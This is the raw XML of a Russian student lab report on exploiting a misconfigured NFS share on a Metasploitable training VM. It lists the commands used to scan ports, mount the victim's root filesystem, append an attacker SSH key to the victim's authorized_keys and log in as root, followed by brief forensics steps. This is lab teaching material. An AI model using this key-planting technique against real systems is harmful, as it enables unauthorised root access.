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Тыщенко Леонид Михайлович, 11-902 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:smallCaps w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:smallCaps w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Лабораторная работа №4. Использование уязвимости неправильно сконфигурированной NFS Share.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8"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="624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Атака на Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="360" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="624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Сканирование портов Metasploitable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tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="62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 файл /var/tmp/scan.txt с результатом сканирования портов;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tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="62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определены порты, которые используют сервисы rpcinfo, nfs и ssh, и их статус (2049, 22, 111).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left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="62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Оценка работы NFS сервера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1134"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="62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выполнена команду rpcinfo –p 192.168.164.130;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 rpcinfo делает вызов к серверу RPC и сообщает о его состоянии. Мы просим RPC сервер Metasploitable показать нам все свои задачи RPC, которые выполняются на данный момент. В данном случае нас интересует nfs сервер.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pos="1134"/>
        </w:tabs>
        <w:spacing w:after="280" w:before="280" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="62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showmount -e MS_IP - запросить вывод состояния NFS сервиса на машине жертвы.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Каталог “/” – является корнем файловой системы. Привилегии монтировать в корень файловой системы дает всем окружающим пространство для дальнейших действий. </w:t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8"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="624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 неправильно сконфигурированной NFS Mount.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="360" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="624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Создание пары ключей SSH.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tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="62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 каталог /root/.ssh;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pos="1134"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="62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выполнена команда ssh-keygen -t rsa -b 4096 для создания ключей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="360" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="624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Монтирование файловой системы Metasploitable.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tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="62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примонтирована файловая система машины-жертвы командой mount -t nfs 192.168.164.130:/ /mnt -o nolock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numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="360" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="624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Изменение файла authorized_keys машины-жертвы.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скопирован публичный ключ командой cp /root/.ssh/hacker_rsa.pub /mnt/root/.ssh/;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скопирован публичный ключ в authorized_keys командой cat id_rsa.pub &gt;&gt; authorized_keys;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просмотреть измененный файл authorized_keys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="360" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="624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Получение root прав.</w:t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5"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="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выполнен переход в каталог /root/.ssh/;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установлено подключение по ssh к машине жертвы.</w:t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8"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="624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Форензика</w:t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4"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="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просмотрены список подключенных машин к серверу NFS командой showmount –a 192.168.164.130;</w:t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4"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0"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размонтирована файловая система машины-жертвы;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="624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Оформление результатов работы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6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0" w:firstLine="624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0" w:firstLine="624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0" w:firstLine="624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227" w:firstLine="133"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2064" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2784" w:hanging="180"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3504" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4224" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4944" w:hanging="180"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5664" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6384" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="7104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0" w:firstLine="624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0" w:firstLine="454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1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="624"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="624"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="624"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="454"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="454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9">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="624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